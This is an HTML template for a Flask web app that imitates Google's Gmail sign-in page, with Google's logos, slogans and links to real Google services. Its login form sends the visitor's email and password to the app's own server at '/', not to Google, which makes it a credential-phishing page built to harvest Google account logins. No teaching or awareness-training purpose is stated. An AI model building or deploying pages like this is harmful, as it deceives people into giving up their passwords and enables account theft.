<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width = device-width" />
    <meta name="robots" content="FOLLOW,INDEX" />
    <link rel="stylesheet" href="{{url_for('static',filename='style.css')}}" type="text/css" media="all" />
    <title>Google Login Page</title>
  </head>
  <body>
    <img id=google-img src="{{url_for('static',filename='/images/logo.png')}}" alt="Logo" />
    <h1>One Account.All of Google.</h1>
    <p>Sign in to continue to Gmail</p>
             <!--LOGIN FORM-->
    <div id="container">
      <img src="{{url_for('static',filename='images/user-icon.png')}}" alt="Icon" />
      <form action="/" method="POST" accept-charset="utf-8">
        <input type="email" name="username" id="username" value="" placeholder = "Email" required/>
      
        <input type="password" name="password" id="password" value="" placeholder = "Password" minlength= "8" maxlength = "20" required/>
        
        <input type="submit" name="submit" id="submit" value="Sign In" />
       
        <input type="checkbox" name="checkbox" id="checkbox" checked/>
        <label for="checkbox">Stay sign in?</label>
        <a href="https://support.google.com/">Need help?</a>
      </form>
    </div>
    <a href="https://accounts.google.com/SignUp" id = "account">Create an account</a>
    <p >One Google account for everything Google</p>
    <footer>
      <a href="https://mail.google.com/mail/mu/"><img class="footer-img" src="{{url_for('static',filename='images/gmail-logo.png')}}" alt="Gmail" /></a>
      
      <a href="https://www.google.com/intl/en_in/drive/"><img class="footer-img" src="{{url_for('static',filename='images/google-drive.png')}}" alt="Drive" /></a>
      
      <a href="https://www.youtube.com"><img 
      id = "Youtube-logo"class="footer-img" src="{{url_for('static',filename='images/youtube-logo.png')}}" alt="Youtube"/></a>
      
      <a href="https://www.google.co.in/maps"><img  class="footer-img" src="{{url_for('static',filename='images/google-maps.png')}}" alt="Maps" /></a>
      
      <a href="https://play.google.com/"><img class="footer-img" src="{{url_for('static',filename='images/google-play.png')}}" alt="PlayStore" /></a>

     </footer>
  </body>
</html>